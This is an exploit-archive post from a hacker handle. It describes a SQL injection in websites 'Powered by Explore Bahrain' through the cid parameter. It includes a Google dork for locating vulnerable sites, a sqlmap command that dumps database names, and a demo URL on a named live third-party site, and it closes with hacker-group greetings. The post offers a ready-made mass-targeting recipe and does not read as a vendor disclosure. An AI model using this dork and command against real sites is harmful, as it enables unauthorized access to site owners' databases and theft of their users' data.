Explore Bahrain SQL Injection Vulnerability

2016.09.01
sa 1337r00t (SA) sa
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: SQL Injection Vulnerability [ Powered by Explore Bahrain ] |[+] |[+] Exploit Author: 1337r00t |[+] |[+] Exploit Team Author: T34m D4rkn3ss R00m |[+] |[+] Vendor Homepage: www.explorebahrain.com |[+] |[+] Google Dork: intext:Powered by Explore Bahrain " inurl:?cid= |[+] |[+] Tested on: Mozilla Firefox , SQLMAP |[+] |[+] Date: 31/7/2016 |[+] |--------------------------------------------------------------| |[+] Exploit :- |[+] |[+] http://[$Site].php?cid=[SQL] |[+]-----------------------------------------------------------| |[+] p0c :- |[+] |[+] Open SQLMAP :- |[+] ./sqlmap.py -u http://[$Site]products.php?cid=[SQL] --dbs --batch |[+] |--------------------------------------------------------------| |[+] Demo:- |[+] |[+] http://www.arepro.bh/products.php?cid=6' |[+] |--------------------------------------------------------------| |[+] My Accounts :- |[+] |[+] Twitter:1337r00t |[+] Instagram: 1337r00t |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+]-------------------------------------------[+] |[+] G2 : Killer~X - 3NeeDaN HacKeR - Saudi HeX - Lion Hacker - Ev!L r00t - BaRQawI - LaTh3 - BL4ck M4n - Safaa Hacker |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : 1337r00t |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top